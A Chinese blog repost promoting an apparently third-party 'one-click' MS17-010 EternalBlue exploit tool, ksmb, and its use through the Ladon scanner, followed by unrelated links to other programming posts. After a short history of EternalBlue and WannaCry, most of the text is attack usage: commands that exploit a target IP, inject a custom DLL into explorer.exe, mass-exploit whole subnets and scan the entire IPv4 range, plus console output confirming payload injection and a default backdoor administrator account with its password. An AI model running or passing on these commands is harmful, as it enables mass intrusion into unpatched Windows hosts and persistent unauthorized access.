1. 全栈程序员必看首页

〖EXP〗NSA MS17010永恒之蓝一键工具

全栈程序员-站长 未分类 阅读 66

〖EXP〗NSA MS17010永恒之蓝一键工具漏洞简介永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。漏洞检测无损检测,不会对目标造成任何危害,大家无需担心Ladon192.168.1.8MS1701

大家好,又见面了,我是你们的朋友全栈君。

漏洞简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

漏洞检测

无损检测,不会对目标造成任何危害,大家无需担心

Ladon 192.168.1.8 MS17010
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/c MS17010

检测发现存在漏洞高亮显示
image

独立使用

只需提供IP或IP列表即可自动利用永恒之蓝,当然也可以使用Ladon来批量甚至全网

PS: 由于当时漏洞影响很大,所以并未放出一键批量工具,现在4年过去了,还没打补丁就只能建议开除维护人员了,工具调用的是NSA原版的EXP,所以整个SMBSCAN目录里的文件基本上都是被杀的,这就不方便集成在Ladon里,以免Ladon被所有杀软杀。

C:\Users\k8gege\Desktop\SmbExp>ksmb 192.168.1.89
MS17010-EXP ETERNALBLUE by K8gege

IP:  192.168.1.89
OS:  64-bit 6.1 build 7601     Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE     - DANE  ETERNALROMANCE  - FB    ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected

只IP默认445端口

ksmb 192.168.1.89

自定义端口

ksmb 192.168.1.89 445
适用于代理出来打,不用考虑做免杀,而且免杀一堆文件也很麻烦

自定义DLL

ksmb 192.168.1.89 445 mydll.dll

注入指定进程

ksmb 192.168.1.89 445 mydll.dll explorer.exe

Ladon调用

使用Ladon可轻松批量使用自己的POC,即只需要实现一个功能,剩下交给Ladon,不用每次来什么新洞都得浪费时间写批量利用工具。除了花一堆时间调式EXP,还得把它弄成批量,批量又得考虑多线程是否兼容POC里的代码等等问题,等写完时效性都过了。Ladon可批量主机、批量URL、批量网段、全网等等,非常方便,下面就是调用ms17010exp的例子。

C:\Users\k8gege\Desktop\SmbExp>Ladon 192.168.1.89 ksmb.exe
Ladon 7.5
Start: 2020-12-17 23:40:16
Runtime: .net 2.0  ME: x64 OS: x64
OS Name: Microsoft Windows 8.1 Enterprise
RunUser: k8gege PR: -IsUser
PID: 5804  CurrentProcess: Ladon

Call DiyMoudle (c# exe)
load ksmb.exe
ICMP: 192.168.1.89      00-0C-29-CF-FE-E1       VMware
MS17010-EXP ETERNALBLUE by K8gege

IP:  192.168.1.89
OS:  64-bit 6.1 build 7601     Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE     - DANE  ETERNALROMANCE  - FB    ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected

批量利用

Ladon 192.168.1.89/c ksmb.exe
Ladon 192.168.1.89/24 ksmb.exe

全网扫描

Ladon 0.0.0.0-255.255.255.255 ksmb.exe

成功结果

自带DLL会添加以下管理员用户
k8ms17010exp K8gege520!@#

可替换DLL,执行自定义功能

image

下载

EXP小密圈内下载

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/130055.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • 八皇后问题详解(四种解法)[通俗易懂]

    八皇后问题详解(四种解法)[通俗易懂]

    八皇后问题详解(四种解法)[通俗易懂]如果你去百度百科八皇后这个问题,你会发现人家也是历史上有头有脸的一个问题,最后一句“计算机发明后就有一万种方式解决这个问题”读起来也让程序猿们很快活。闲话少说,开始阐述我的思路:最无脑的解法一定是八个for遍历,浪费了太多的计算资源在各种无用功上面,我们稍微构思一下:首先如何决定下一个皇后能不能放这里可以有两种思路,第一种是尝试维护一个8*8的二维矩阵,每次找到一个空位放下一个皇后就把对应行列对

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月30日
    24
  • Integer比较

    Integer比较

    Integer比较

    全栈程序员-站长的头像 全栈程序员-站长
    2022年1月5日
    54
  • shufflenetv1详解

    shufflenetv1详解

    shufflenetv1详解shufflenetv1知识的搬运工又来了论文地址:shufflenetv1论文地址ShuffleNet:AnExtremelyEfficientConvolutionalNeuralNetworkforMobileDevices。shufflenet是一篇关于降低深度学习计算量的论文,其可以运行在手机等移动设备端,发表在了CVPR2018上摘要此论文是一篇效率很高的cnn框架,可以运行在移动设备端,(例如,10-150 MFLOPs)而设计的,该结构利用分组逐点卷积(poin

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月3日
    3
  • windows7 python 指定源组播 10049_试图绑定到特定的外部ip :: [Errno 10049]请求的地址在其上下文中无效无法打开socket-(python 2.7)…[通俗易懂]

    windows7 python 指定源组播 10049_试图绑定到特定的外部ip :: [Errno 10049]请求的地址在其上下文中无效无法打开socket-(python 2.7)…[通俗易懂]

    windows7 python 指定源组播 10049_试图绑定到特定的外部ip :: [Errno 10049]请求的地址在其上下文中无效无法打开socket-(python 2.7)…[通俗易懂]socket.INADDR_ANY等于socket.bind(‘0.0.0.0’)如果绑定到“0.0.0.0”可以监听所有接口(可用)MoxaTCP示例:importsocket,timeimportthread#Exampleclientclass_client:def__init__(self):self.status=Falsedefrun(self,clientso…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月27日
    0
  • 八电极脂肪秤方案软硬件与APP功能介绍[通俗易懂]

    八电极脂肪秤方案软硬件与APP功能介绍[通俗易懂]

    八电极脂肪秤软硬件端功能说明:  LED显示:    1、3个超白光LED    2、显示数字:188.8.8(两个小数点)    3、显示符号:ble、kg指示符    4、不显示体脂率(由APP端显示)    电源:4.5V的3节干电池    开机:压力开机,上秤重量达到开机压力值(5±2kg)开机    按键:单位键,无实体按键,    称重范围:标称:5-180kg,    分度:0.05kg    小重量刷零:最小锁定重量5kg,5kg以下重

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月9日
    34
  • mysql怎么设置远程连接_允许远程连接在哪里

    mysql怎么设置远程连接_允许远程连接在哪里

    mysql怎么设置远程连接_允许远程连接在哪里MySql设置远程连接Windows与Linux同理本文使用的是MySQL8.0版本,安装在centos7中,不管是在Windows还是Linux中都是通用的,基于权限修改来达到远程连接的目的Windows与Linux同理打开终端控制面板,输入mysql-uroot-p你的Mysqlroot密码回车…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月25日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号